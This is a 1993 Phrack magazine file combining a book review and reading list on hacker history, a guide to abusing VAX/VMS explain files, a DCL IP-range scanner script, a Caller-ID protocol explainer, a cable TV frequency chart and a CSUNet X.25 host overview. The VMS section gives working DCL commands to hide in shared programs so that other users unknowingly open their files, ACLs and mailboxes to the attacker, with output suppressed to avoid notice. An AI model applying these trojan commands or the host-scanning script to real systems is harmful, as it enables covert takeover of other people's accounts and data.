|
==Phrack Magazine== Volume Four, Issue Forty-Two, File 5 of 27 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== (cont) ****************************************************************************** `'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`' '` '` `' Approaching Reality: `' '` ~~~~~~~~~~~~~~~~~~~~ '` `' A review of the new book Approaching Zero `' '` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ '` `' by Aleph One `' '` ~~~~~~~~~~~~ '` `' `' '`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'` When I started to read this book, I expected to read one more of the series of books that claim to be the "definitive history of the computer underworld" and the "first book to define the technological subculture of phreaking, hacking, and virus writing". After all what does a guy that writes for GQ, The Hollywood Reporter, Variety and Time know about the computer underground? Well to my surprise the authors, Paul Mungo and Bryan Clough (a member of the Virus Strategy Group, which is coordinated by New Scotland Yard's Computer Crime Unit), did a pretty good job at presenting the facts as they are. For the first time I heard a reporter and a computer crime expert give real figures at how much computer crime has really cost. Other than a few minor technical errors and the fact that they fail to mention some people and groups (especially in the virus section), the book was enjoyable to read. The book covers the history of the underground starting with its beginnings in the 60's, from phreaking to the adventures of Captain Crunch and the rest of the bunch to the not so long ago Operation Sundevil and the raids all over the country on members of the LOD, MOD and DPAC. It also goes through the events that led to the German hackers spy trials, and to the new generation of virus writers that are creating the new kind of living organisms that roam cyberspace. They also discuss the gray scale that categorizes hackers, from the good hackers to the bad to the ones not that bad... those who are in it for profit and those who are in it to learn. Hopefully all the readers of the book, hackers, security specialists, reporters and the general public will get a better understanding of what motivates hackers to do what they do by learning where they come from. To the hackers let them learn not to repeat their past errors. I hope that the time of raids and sting operations has passed, but the late developments in the Washington 2600 meeting have pulled a shadow over my hopes. Has no one learned? Have the SS and FBI nothing better to do? Just a few moths back someone pulled one of the greatest scams of all by setting up a fake ATM and stealing a few thousand dollars. These are the kind of people the authorities should be after. And to the hacker, don't sell yourself! Remember this is a learning trip, once you start forgetting to learn and start making money out of it, it is just another job, an illegal one at that. Approaching Zero was an exciting and interesting surprise. It has given me the hint that maybe someone out there understands and I hope that everyone that reads it (and you must, you must read and learn all you can) will also understand. I just leave you with these words: Hacking comes from the heart - sometimes in the form of an obsession, sometimes in the form of a hobby - once that dies, there is nothing left to do. No more traveling trough the nets! No more exploring new systems! You might as well turn the power off. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= What fallows is a list of books, papers and articles for those that want to know a little more of how the media portrays us, and a little more about the story of hacking in general. Books: ~~~~~~ - "Approaching Zero" by Paul Mungo & Bryan Clough. Random House 1992. - "Beating the System" by Owen Bowcott & Sally Hamilton. London: Bloomsbury, 1990. - "Computer Viruses - A High-Tech Disease" by Ralf Burger. Grand Rapids, MI: Abacus, 1988. - "The Hackers' Handbook" by Hugo Cornwall. London: Century Communications, 1985. - "Computers Under Attack" by Peter Denning. Addison Wesley, 1990. - "Profits of Deceit" by Patricia Franklin. London: William Heinemann, 1990. - "Cyberpunk" by Katie Hafner & John Markoff. London: Fourth Estate, 1991. - "Out of the Inner Circle" by Bill Landreth (aka The Cracker). Redmond, WA.: Tempus Books, 1985. - "Sillicon Valley Fever" by Judith K. Larsen & Everett M. Rogers. London: George Allen & Unwin, 1985. - "Computer Viruses" by Ralph Roberts. Greensboro, NC: Compute! Books, 1988. - "The Cuckoo's Egg" by Clifford Stoll. New York: Doubleday, 1989. - "Spectacular Computer Crimes" by Buck BloomBecker. Dow Jones-Irwin, 1990. - "The New Hacker's Dictionary" by Eric Raymond. MIT Press, 1983. - "The Hacker Crackdown" by Bruce Sterling. Bantam Books, 1992. - "The Little Black Book of Computer Viruses" by Mark Ludwig. American Eagle Publications, 1991. - "Artificial Life" by Steven Levy. Panthenon, 1992. (For those virus writers out there, use your tallen to create life.) Articles & Papers: ~~~~~~~~~~~~~~~~~~ - "Crime and Puzzlement" by John Perry Barlow. Whole Earth Review, Fall 1990: 44-57. - "The Casino Virus - Gambling with Your Hard Disk" by Jim Bates. Virus Bulletin, March 1991: 15-17. - "The TP Viruses" by Vesselin Bontchev. Postings to Virus-L 1990. - "In Defense of Hackers" by Craig Bromberg. The New York Times Magazine, April 21, 1991. - "Bulgaria - The Dark Country" by Bryan Clough. Virus Bulletin, December 1990: 9-11. - "Voice Mail Computer Abuse Prosecution: United States v. Doucette a/k/a Kyrie" by William J. Cook. Safe Computing Proceedings of the Fourth Annual Computer Virus & Security Conference, 1991, Organized by National Computing Corporation. - "Invasion of the Data Snatchers!" by Philip Elmer-De Witt. Time, September 26, 1988: 63. - "Data Exchange and How to Cope with This Problem: The Implication of the German KGB Computer Espionage Affair" by Hans Gliss. Paper presented at Securicom Italia, October 1989. - "The Implications of the SPANet Hack." Computers Fraud & Security Bulletin, Vol. 10, No. 2, 1987. - "The Brain Virus: Fact and Fantasy" by Harold J. Highland. Computers & Security, August 1988: 367-370. - Computer Viruses - A Post Modern." Computer & Security, April 1988: 117-184. - "Terminal Delinquents" by Jack Hitt & Paul Tough. Esquire, December 1990. - "The Social Organization of the Computer Underground" by Gordon R. Meyer. M.A. Thesis Submitted to the Graduate School, August 1989. - "Satanic Viruses" by Paul Mungo. GQ, February 1991: 126-130. - "Secrets of the Little Blue Box" by Ron Rosenbaum. Esquire, October 1971, Collected in Travels with Dr. Death. New York: Viking Penguin, 1991. - "The Worm Program - Early Experience with a Distributed Computations" by John F. Shoch. Communications of the ACM, Vol. 25, No. 3, March 1982. - "The Search for Den Zuk" by Fridrik Skulason. Virus Bulletin, February 1991: 6-7. - "Crisis and Aftermath" by Eugene H. Spafford. Communications of the ACM. Vol. 32, No. 6, June 1989. - "GURPS Labor Lost: The Cyberpunk Bust" by Bruce Sterling, Effector, September 1991: 1. - "Stalking the Wily Hacker" by Clifford Stoll. Communications of the ACM. Vol. 31, No. 5, May 1988. - "The Kinetics of Computer Virus Replication." by Peter S. Tippett. FundationWare, March 1990. - "The General and Logical Theory of Automata" by John L. von Neumann. Hixon Symposium, September 1948. - "Here Comes the Cyberpunk" by Eden Restored. Time, February 8, 1993: 58-65. - "Surfing Off the Edge" by Richard Begar. Time, February 8, 1993: 62. - "Can Hackers Be Sued for Damages Caused by Computer Viruses?" by Pamela Samuelson. Communications of the ACM. Vol. 32, No. 6, June 1989. - "Viruses and Criminal Law" by Michael Gemignani. Communications of the ACM. Vol. 32, No. 6, June 1989. - "Password Cracking: A Game of Wits" by Donn Seeley. Communications of the ACM. Vol. 32, No. 6, June 1989. - "The Cornell Commission: On Morris and the Worm" by Ted Eisenberg, David Gries, Juris Artmanis, Don Holcomb, M. Stuart Lynn & Thomas Santoro. Communications of the ACM. Vol. 32, No. 6, June 1989. - "Desperately Seeking Cyberspace" by Paul Saffo. Personal Computing, May 1989: 247-248. - "Secrets of the Software Pirates" by Bylee Gomes. Esquire, January 1982: 58-64. - "Trouble in Cyberspace" by Willard Uncapher. The Humanist, September/October 1991: 5-14,34. - "Is Computer Hacking a Crime?" Capture of a discussion held on the WELL. Harper's Magazine, March 1990: 45-57. - "The United States vs. Craig Neidorf" by Dorothy E. Denning. Communications of the ACM, Vol. 34, No. 3, March 1991: 24-32. - "Colleagues Debate Denning's Comments." Communications of the ACM. Vol. 34, No. 3, March 1991: 33-41. - "Denning's Rebutal" by Dorothy E. Denning. Communications of the ACM. Vol. 34, No. 3, March 1991: 42-43. - "Coming into the Country" by John P. Barlow. Communications of the ACM. Vol. 34, No. 3, March 1991: 19-21. - "Off the Hook" by Julian Dibbell. Village Voice, August 21, 1990: 8. - "On Line and Out of Bounds" by Julian Dibbell. Village Voice, July 24, 1990:27-32. - "Hi-Tech Mall Crawl" by Julian Dibbell. Village Voice. March 1990: 12 - "Samurai Hackers" by Lynda Edwards. Rolling Stone, September 19, 1991: 67-69. - "Crackdown on hackers `may violate civil rights'" by Dan Charles. New Scientist, July 21, 1990: 22. - "United States v. Zod." The Economist, September 1, 1990: 23. - "Drop the Phone." Time, January 9, 1989: 49. - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific American, May 1984: 14-21. - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific American, March 1985: 14-23. - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific American. March 1989: 110-113. - "Computer Security: NAS Sounds the Alarm" by Eliot Marshall. Science, Vol. 250: 1330. - "Students Discover Computer Threat" by Gina Koda. Science, Vol. 215, 5 March, 1982: 1216-1217. - "A nationwide Computer-Fraud Ring Is Broken Up." The New York Times National, Sunday, April 19, 1992. - "Hackers: Is a Cure Worse than the Disease?" by Mark Lewyn. Business Week, December 4, 1989: 37-38. - "Computer Hacking Goes to Trail" by William F. Allman. U.S. News & World Report, January 22, 1990: 25. - "Morris Code: by Katie Hafner. The New Republican, February 19, 1990: 15-16. - "Hackers Intentions Key to Court Case" by David Lindley. Nature. Vol. 340, August 3, 1989: 329. - "Problems of Security" by David Lendley. Nature. Vol. 340. July 27, 1989: 252. - "Hostile Takeovers" by Paul Wallich. Scientific American, January 1989: 22-23. - "The Worm's Aftermath" by Eliot Marshall. Science, Vol. 242, November 25, 1988: 1121-1122 - "Researcher Fear Computer Virus' Will Slow Use of National Network" by Calvin Sims. The New York Times, Monday, November 14, 1998: B6. - "Networked Computers Hit by Intelligent `Virus'" by Joseph Palca & Seth Shulman. Nature, Vol. 336, November 10, 1988: 97. - "The Science of Computing: Computer Viruses" by Peter J. Denning. American Scientist, Vol. 76, May-June 1988:236-238. - "Cyberpunks and the Constitution" by Philip Elmer-Dewitt. Time, April 8, 1991:81. - "Plan to outlaw hacking." Nature, Vol. 341, October 19, 1989: 559. - "Computer System Intruder Plucks Passwords and Avoids Detection" by John Markoff. The New York Times National, Monday, March 19, 1990. - "Networked Computer Security" by S.J. Buchsbaum. Vital Speeches of the day. December 15, 1991: 150-155. - "Halting Hackers." The Economist. October 28, 1989: 18. - "Revenge of the Nerds" by Nocholas Martin. The Washington Monthly, January 1989: 21-24. - "Greater awareness of security in aftermath of computer worm" by Seth Shulman & Joseph Palce. Nature, Vol. 336, November 1988: 301. - "Avoiding Virus Hysteria" by Patrick Honan. Personal Computing, May 1989: 85-92. ***************************************************************************** {----------------------------------------------} { } { VMS/VAX Explain Files Explained } { or } { Security Holes in the VAX and DCL } { } { By: The Arctic Knight } { } {----------------------------------------------} VAX/VMS hacking has declined in popularity over the years due to the abundance of UNIX machines now available. It has even gotten bad press from fellow hackers. Included in this file is a security hole the size of , oh, any of the older IBM mainframes. With a little curiosity, persistence, and down right stubbornness I came across this rather obvious hole in the system. However, this hole may be so obvious that it has remained relatively hidden until now, especially since the decline of DCL users. On most VAX systems, there is something called explain files. These are usually help files that are made up by the system operators or borrowed from somewhere to help better explain the way certain features of the system work, whether they be general VAX commands, or system-specific programs. When you are in your account (Presumably, a fake one, as this can be tracked down if you are foolish) type: $ explain index and you will get a list of all the explain files on your system. Go ahead and take a look around these just to get a feel of what it looks like. It should be a menu driven list of text files to view or programs to run(!!!). Most system operators only set this up to show various text files describing commands like mentioned above. However, DCL .com files can be run from explain files as well. Now comes the fun. Many systems will also allow users to set up there own explain file. A really nice way to make it easy for other users to view text files or run programs that you have set for group or world access. The first thing someone needs to do is make a file called INTRO.LKT which will contain whatever introduction text that you would like displayed before your explain file menu is displayed(i.e. you might have a description of yourself, your duties, or a funny poem, or WHATEVER YOU WANT THAT CAN BE CONTAINED IN A TEXT FILE!!!!) You can use any editor to do this like EDT(a line editor) or TPU(a full screen editor). You will need to type something along these lines to create the file: $set vt=100 !if using a full screen editor like TPU $edit/tpu intro.lkt After you are finished typing in the file, if you used TPU (A much better choice than EDT), you press <CONTROL-Z> to save the file. Now you must create a file called INDEX.LKI which will contain the file directories, filenames, and short descriptions of the files that you want to have displayed. You do this in the same manner as above, by entering an editor, and creating the file. $edit/tpu index.lki Now, in this file the lines should look like the following: (File Directory) (Filename) (File Description) Phrack41.txt A complete copy of Phrack 41 for your enjoyment. User:[aknight.hack]vms.txt A guide to hacking VMS systems. Temp$1:[aknight.ftp]ftplist.txt A list of FTP servers in-state. Now, to explain these three lines. The first one will look for the program in your main directory. The second line will look for the program listed after it on the device called USER and in the HACK directory within the AKNIGHT directory. The final line will look on the device called TEMP$1 in the FTP directory within the AKNIGHT directory. Adding DCL programs will be explained in a minute, but first lets get this up and running. Now, that you have typed in the text files you want, and saved this file you need to set the protection on your main directory and any others that need accessing like the text files to group and world access. For the above example one would want to type(assuming you are in your main directory): $set prot=(g:re,w:re) user:[000000]aknight.dir !This is my main directory $set prot=(g:re,w:re) user:[aknight.hack] $set prot=(g:re,w:re) temp$1:[000000]aknight.dir !My second storage device $set prot=(g:re,w:re) temp$1:[aknight.ftp] $set prot=(g:r,w:r) phrack41.txt !Giving privs to read only $set prot=(g:r,w:r) user:[aknight.hack]vms.txt $set prot=(g:r,w:r) temp$1:[aknight.ftp]ftplist.txt Now, if you type: $explain aknight ! (my username in this instance,your normally) You should get a print out to screen of your INTRO.LKT file and then a message along the lines of "Hit <return> to continue". When you hit return a menu will appear very similar to the normal explain file menu except with your files listed and their descriptions which were accessed by the computer from your INDEX.LKI file. It would look like this(or something similar) in the above example. {a print out of my INTRO.LKT file...} Hit <RETURN> to continue EXPLAIN AKNIGHT ================================================================================ (A) PHRACK41 T-A complete copy of Phrack 41 for your enjoyment. (B) VMS T-A guide to hacking VMS systems. (C) *EXPLAIN/USER AKNIGHT FTPLIST T-A list of FTP servers in-state. (Q) TERMINATE THIS PROGRAM ================================================================================ T = Text Display P = Program to be run (* = Related Information) Choose A-C, Q, oe type HELP for assistance. Now you have an explain file. Pressing A-C will print those files to screen with pauses at each page if set up on your system/account to do so. I typed out number C the way I did, because when it has to access a directory other than it's main one, it will usually do this. I think there is away around this, but to be quite honest I haven't bothered figuring it out yet. When you quit, you will be dropped back off at your main prompt. The reason you need to set your protections, is because even thought from your account, it may look like it is working, if you don't set your protections as described above, NO ONE else will be able to view it!! Now, comes the fun part. Putting DCL .COM files into your explain file. These are put into your index just like any text file. So you could type up a program to let someone copy the public files you have in your account to their directory, or something similar. The security flaw comes in here and it is a big one. Since a user is accessing your explain file from their account, any file that they run, issues commands in their account. So, one might plant a line in the middle of the above program that say something like: $set def sys$login !Returns them to their main directory. $set prot=(g:rwed,w:rwed) *.*;* !Their files are now read, write, execute, !and deleteable by anyone, including you. Here is another idea. Say you create a text reader in DCL, to allow people to jump around in the text files you have, skip pages, etc. called TYPE.COM in your main directory. Anytime you can fool people into thinking that the computer is taking a little time to think, you can insert some major commands, i.e. when it is skipping pages, or coping files, which almost takes no time at all in reality. I STRONGLY suggest starting any program you plan to nest commands like this into with: $set noverify Which will make sure that the program lines don't get printed to the screen as they are running. Another important command to know is the following which will cause the next text output from the VAX to be sent to a NULL device, so it will essentially be lost and not printed to the screen. So, if one is accessing someone's mailbox, you don't want a messaging appearing on screen saying that you have entered VAX/VMS mail or whatever. The command is: $assign nl:sys$output/user If you forget the /user it will send the output to the null device for the session, instead of just one line. Some other things one might do would be to add yourself to someone's ACL(access control list) by typing: $set acl/acl=(ident=[aknight],access=control) *.*;* Now, this will give you access to all their files just as if you were the user, however if they bother to ever do a dir/prot command your username will be printed all over the screen, so one would suggest if you must do this, to use a fake account. Same with this below command: $assign nl:sys$output/user $mail set write aknight The second line will give me read and write access to someone's mailbox, but once again if they bother to check their mailbox protections your username will be displayed. In case, you haven't realized this yet, this all has A LOT of potential, and what I have mentioned here is just the tip of the iceberg and really mostly small and even foolish things to do, but the fact comes down to ANYTHING the user can do in their account, YOU can do in there account if you know the right commands and have the patience to nest them into a .COM file well enough. When you have created the .COM file and added it to the INDEX.LKI file, then you will need to set the protection of the file like so: $set prot=(g:e,w:e) type.com !Execution only. No read privs. You now have it a fully functional explain file that is only held down by your imagination. Remember, malicious actions aren't the sign of a true hacker, so don't delete a users complete directory just because you want to show of your power. Most people won't be impressed. If your a SYSOP, fix this DAMN HOLE!!! And if your a user well, learn the system quickly, explore, absorb, and discover some other hole before the above SYSOP patches this one...... COMMENTS, QUESTIONS, ADDITIONS, ETC can be sent to PHRACK LOOPBACK. ENJOY!! {______________________________________________________________________________} ***************************************************************************** A Internet Scanner (War Dialer) by MadHatter Purpose of this program ~~~~~~~~~~~~~~~~~~~~~~~ Remember those scanner, war dialer programs everyone used to scan areas of telephone numbers to find unknown hosts? Well, now your on the net and you're targeting some certain establishment, and you know which part of the net they own, but the hell if you know what the actual IP addresses of their hosts are... Telneting to NIC.DDN.MIL is no help, their records are a year old... Might as well have been 10 yrs ago... So you type every possible IP address in. Right? After a while that shit gets tiring... Well, hell let the computer do it, that's what its there for. More speed, no sore fingers, no bitching, and it runs when you're not there. Almost perfect..... Program Details ~~~~~~~~~~~~~~~ DCL is the language and it runs on Vaxen. A,B,C,D respectively represent the starting IP address. E,F,G,H respectively represent the ending IP address (ex. If you what to start at 4.1.1.1 and end at 6.1.1.1 then a = 4, B = 1, etc., E = 6, F = 1, etc.) The prog creates a data file (FINAL.DAT) that holds all successful connections. If you run it in batch, it also creates a .log file. This by far takes up most of the memory. When the program quits, delete it. This prog is just one big loop. It finds a good telnet address and then reIFINGERs there, saving it. Program Changes ~~~~~~~~~~~~~~~ If you run it in batch, then you might (probably) have to define where the IFINGER or FINGER program is. Make sure it is the one for FINGERing remote hosts, the commands for it vary. Why do you have to define it? Because the dumb-ass sysop couldn't think of why anyone would want to use it in batch. Problems ~~~~~~~~ The IFINGER (FINGER) command might not connect to some hosts from your system. Why can you TELNET there but no IFINGER? It all probably has to do with the other host (it has tight security, too far away, doesn't support FINGERing, etc.). No Solutions (Just one) ~~~~~~~~~~~~~~~~~~~~~~~ You say if I can TELNET to more places than IFINGERing, why not base the scanner on the TELNET command? Two reasons: (1) the security with the TELNET command requires its output goes to a terminal, never to run in batch; (2) the TELNET command does not give the character address (at least not on the system I use). To have the character address is valuable to me. The program lists the IP address, the character address, then whatever finger came up with. When running in batch, the program will quit eventually (do to MAX CPU time or exceeded disk quota). This can be a pain (especially if its CPU time), you can always get more memory. Try changing the file specifics in the prog, and run many versions of it at once, to get as much cpu time as possible. For memory, clear your account, or get more of them. Another problem is when your program has stopped and you have nothing in FINAL.DAT file. So where do you start the batch off again? All I can say is count the number of failed connections and add 'em to your previous start address, start at that address. More Ideas ~~~~~~~~~~ If you want the net area of an establishment then ftp to NIC.DDN.MIL and get the hosts listing, or TELNET there and search for the name. Some areas of the net do not like to be scanned. Your sysop will get nasty calls, and then you will get nasty e-mail if you for instance scan the Army Information Systems Center. Or any other government org. Of course, this program wouldn't hurt them at all, it would bounce back. They use firewalls. But they will bitch anyway. After you run this program for awhile, you'll notice the net is really a big empty place. Hosts are few and far between (at least address wise). Are you agoraphobic yet? What do you do with all this room? MadHatter *----------------------------CUT HERE------------------------------------------* $ A = 0 $ B = 0 $ C = 0 $ D = 0 $ E = 257 $ F = 0 $ G = 0 $ H = 0 $ D = D - 1 $ IFINGER := $VMS$UTIL:[IFINGER]FINGER.EXE;1 $ CREATE FINAL.DAT $ LOOP1: $ ON SEVERE_ERROR THEN GOTO SKIP $ D = D + 1 $ IFINGER @'A'.'B'.'C'.'D' $ ON SEVERE_ERROR THEN GOTO SKIP $ ASSIGN TEMPFILE.DAT SYS$OUTPUT $ WRITE SYS$OUTPUT "["'A'"."'B'"."'C'"."'D'"]" $ IFINGER @'A'.'B'.'C'.'D' $ DEASSIGN SYS$OUTPUT $ APPEND TEMPFILE.DAT FINAL.DAT $ DELETE TEMPFILE.DAT;* $ SKIP: $ IF A .EQ. E THEN IF B .EQ. F THEN IF C .EQ. G THEN IF D .EQ. H THEN EXIT $ IF D .EQ. 256 THEN GOTO LOOP2 $ IF C .EQ. 256 THEN GOTO LOOP3 $ IF B .EQ. 256 THEN GOTO LOOP4 $ GOTO LOOP1 $ LOOP2: $ D = 0 $ C = C + 1 $ GOTO LOOP1 $ LOOP3: $ C = 0 $ B = B + 1 $ GOTO LOOP1 $ LOOP4: $ B = 0 $ A = A + 1 $ GOTO LOOP1 $ EXIT *------------------------------------CUT HERE----------------------------------* ***************************************************************************** Caller Identification by (Loq)ue & Key 3/20/93 Caller-Identification (CID), is a relatively new service being offered by several carriers. It is part of a total revamp of the telephone network, with the telephone companies trying to get people to spend more money on their systems. CID is just one of the newer CLASS services, which will eventually lead into ISDN in all areas. Caller-ID allows a receiving party to see the number that is calling before they pick up the phone. It can be used for everything from pizza delivery to stopping prank callers. One scenario made possible from CID is one where a salesman dials your number, you look on a little box and see that it is someone you don't want to talk to, so you promptly pick up the phone, say "Sorry, I don't want any *** *** products" and slam down the receiver. Ah, the wonders of modern technology. Caller-ID starts by a person making a call. When the person dials a number, the local switch rings the calling number once, and then sends a specially encoded packet to the number, after checking to see if that caller has access to the Calling Number Delivery service. The packet can contain any information, but currently it holds a data stream that contains flow control, and error checking data. The specifications state that several signals can exist, however, only the Caller-ID signal is used currently. The CID packet begins with a "Channel Seizure Signal". The CSC is 30 bytes of hex 55, binary 01010101, which is equivalent to 250 milliseconds of a 600 hz square wave. The second signal is the "Carrier Signal," which lasts for 150 milliseconds, and contains all binary 1's. The receiving equipment should have been "woken-up" by the previous signal and should now be waiting for the important information to come across. Next are the "Message Type Word", and the "Message Length Word". The MTW contains a Hex $04 for CID applications, with several other codes being planned, for example $0A to mean message waiting for a pager. The MLW contains the binary equivalent of the number of digits in the calling number. The data words come next, in ASCII, with the least significant digit first. It is padded in from with a binary 0, and followed by a binary 1. A checksum word comes after that, which contains the twos-complement sum of the MLW and data words. The checksum word usually signals the end of the message from the CO, however, other messages for equipment to decode can occur afterwards. Caller-ID can usually be disabled with a 3 digit sequence, which can vary from CO to CO. Several of these have been mentioned in the past on Usenet, in comp.dcom.telecom. Caller-ID chips are available from many sources, however, remember that you must connect these chips through an FCC-approved Part-68 Interface. Several of these interfaces are available, however they are fairly expensive for an amateur electronics hacker. If you have any more questions on CID, mail me at the above address, or post to comp.dcom.telecom. Additional Sources from Bellcore: Nynex Catalog of Technical Information #NIP-7400 SPCS Customer Premises Equipment Data Interface #TR-TSY-0030 CLASS Feature: Calling Number Delivery #FSD-02-1051 CLASS Feature: Calling Number Blocking #TR-TSY-000391 ***************************************************************************** THE "OFFICIAL" CABLE TELEVISION VIDEO FREQUENCY SPECTRUM CHART COURTESY OF: JOE (WA1VIA) & JIM (WA1FTA) CATV CHANNEL FREQUENCY (MHz) CATV CHANNEL FREQUENCY (MHz) ------------------------------------------------------------------------------- 2 2 55.25 37 AA 301.25 3 3 61.25 38 BB 307.25 4 4 67.25 39 CC 313.25 5 5 77.25 40 DD 319.25 6 6 83.25 (85.25 ICC) 41 EE 325.25 --------------------------------------- 42 FF 331.25 7 7 175.25 43 GG 337.25 8 8 181.25 44 HH 343.25 9 9 187.25 45 II 349.25 10 10 193.25 46 JJ 355.25 11 11 199.25 47 KK 361.25 12 12 205.25 48 LL 367.25 13 13 211.25 49 MM 373.25 --------------------------------------- 50 NN 379.25 14 A 121.25 51 OO 385.25 15 B 127.25 52 PP 391.25 16 C 133.25 53 QQ 397.25 17 D 139.25 54 RR 403.25 18 E 145.25 55 SS 409.25 19 F 151.25 56 TT 415.25 20 G 157.25 57 UU 421.25 21 H 163.25 58 VV 427.25 22 I 169.25 59 WW 433.25 ---------------------------------------- 60 W+ 439.25 23 J 217.25 --------------------------------- 24 K 223.25 61 W+1 445.25 25 L 229.25 62 W+2 451.25 26 M 235.25 63 W+3 457.25 27 N 241.25 64 W+4 463.25 28 O 247.25 65 W+5 469.25 29 P 253.25 --------------------------------- 30 Q 259.25 66 A-1 115.25 31 R 265.25 67 A-2 109.25 32 S 271.25 68 A-3 103.25 33 T 277.25 69 A-4 97.25 34 U 283.25 70 A-5 91.25 35 V 289.25 --------------------------------- 36 W 295.25 01 A-8 73.25 ------------------------------------------------------------------------------- * This chart was created 08/19/89 by: WA1VIA & WA1FTA. Some uses include the isolation of CATV interference to other radio services, and building of active & passive filters, and descramblers. This does NOT give you the right to view or decode premium cable channels; without proper authorization from your local cable TV company. Federal and various state laws provide for substantial civil an criminal penalties for unauthorized use. ------------------------------------------------------------------------------- ****************************************************************************** ----------------------------- The CSUNet X.25 Network Overview by Belgorath ----------------------------- C y b e r C o r p s Calstate University, along with Humboldt State, runs a small X.25 network interconnecting its campuses. This file will attempt to give an overview of this network. The hosts on this network are connected via 9600-baud links. The main PAD on this network is a PCI/01 that allows the user to connect to several hosts. Among them are: (At the time of this writing, several of the machines were unreachable. They are marked with "No info available") hum - Humboldt State University CDC Cyber 180-830 (NOS 2.7.1) swrl - A CalState CDC Cyber named "Swirl", running CDCNet. You may use CDCNet to connect to the following hosts: ATL (SunOS, eis.calstate.edu), login as: access to request an account ctp to access CTP CCS CDC Cyber 960-31 (NOS 2.7.1) - This is Swirl without CDCNet COC CDC Cyber 960-31 (NOS 2.7.1) FILLY VAX 6230 (VMS 5.3) ICEP IBM 4381 (VM) OX IBM 4381 (MVS) (Aptly Named) mlvl - University of California's Library Catalog System, named "Melvyl". sb - Calstate/San Bernardino CDC Cyber 180-830 (NOS 2.5.2) sd - San Diego State University CDC Cyber 180-830B (NOS 2.7.1) chi - Calstate/Chico CDC Cyber 180-830 (NOS 2.7.1) - oddly enough this system is running CDCNet with itself as the only host bak - Calstate/Bakersfield CDC Cyber Dual 830 CMR-1 (NOS 2.7.1) this system is running CDCNet, and if you fail the login, you can connect to these systems, if you type fast enough: CCS - Central Cyber 960 System CSBINA - CSUB Instructional Vax 3900 CSBOAA - CSUB Office Automation Vax 4300 CYBER - Local host RBFBATCH - CSUB CDC Cyber Remote Batch Gateway ccs - CDC Cyber 960-31 (CCS from Swirl) coc - CDC Cyber 960-31 (COC from Swirl) dh - Calstate/Dominguez Hills CDC Cyber 960-11 (NOS 2.7.1) - this system runs CDCNet with no hosts.. go figure fre - Calstate/Fresno - No info available ful - Calstate/Fullerton - No info available hay - Calstate/Hayward - No info available la - Calstate/Los Angeles - No info available lb - Calstate/Long Beach - No info available mv - No info available news - No info available nor - Calstate/Northridge - No info available pom - California State Polytechnic University, Pomona - No info available sac - Calstate/Sacramento CDC Cyber 180-830 (NOS 2.5.2) sf - Calstate/San Francisco - No info available sj - San Jose State University - No info available son - Sonoma State University CDC Cyber 180-830 (NOS 2.7.1) - this system runs CDCNet with itself as the only host sm - No info available slo - California State Polytechnic University, San Luis Obispo - No info available sta - Calstate/Stanislaus - No info available ven - No info available carl - No info available caps - CSUNet networking machine. From it, you can connecting to most PAD hosts plus a few more. The extras are: access - Connect to eis.calstate.edu (login as "access") core - Connect to eis.calstate.edu (login as "core") ctp - Connect to eis.calstate.edu (login as "ctp") eis - Connect to eis.calstate.edu (login as "eis") trie - Connect to eis.calstate.edu (login as "trie") csupernet - CSUPERNet appears to be a public-access UNIX. login as "public" for ATI-Net. login as "super" for academic information. login as "atls" for the ATLS system Once you apply for an account here, you can telnet to caticsuf.cati.csufresno.edu to use it. This is all well and good, but how to you access CSUNet? It can be reached via Internet, using the Humbolt PACX (pacx.humboldt.edu). The Humboldt PACX allows several services, among them are: X25 - Connect directly to CSUNet PAD 960 - CDC Cyber 180/830 (Swirl) 830 - CDC Cyber 180/830 (COC from Swirl) VAX - VAX 8700 (VMS V5.3) 70 - DEC PDP 11/70 (running RSTS) SEQ - Sequent S81 (running Dynix V3.1.4 X.25 UNIX software) TELNET - Telnet Server That's really all there is to say concerning the network structure (well, I could go through and list all their X.25 addresses, but I won't). There's a ton more to be said about using this network, but its little quirks and surprises can be left to you to figure out. What I can do here is give a few hints on using CDCNet and the PAD. Using the PAD ~~~~~~~~~~~~~ Once you're at the X.25 PAD, you'll get a message like: CSUnet Humboldt PCI/01, Port: P17 At the "Pad>" prompt, simply type the hostname to connect to. When in doubt, type "help <subjectname>", or just "help" for a list of subjects that help is available on. Using CDCNet ~~~~~~~~~~~~ When a CDC Cyber says "You may now execute CDCNet Commands", this is your cue. You have the following commands available: activate_auto_recognition activate_x_personal_computer change_connection_attribute change_terminal_attribute change_working_connection create_connection delete_connection display_command_information display_command_list display_connection display_connection_attribute display_service display_terminal_attribute do help request_network_operator The ones to concern yourself with are display_service, create_connection, and help. "help" gives the above command listing (useful), "display_service" lists the hosts on the current CDCNet, and "create_connection <host>" creates a connection to "host" on the CDCNet. *******************************************************************************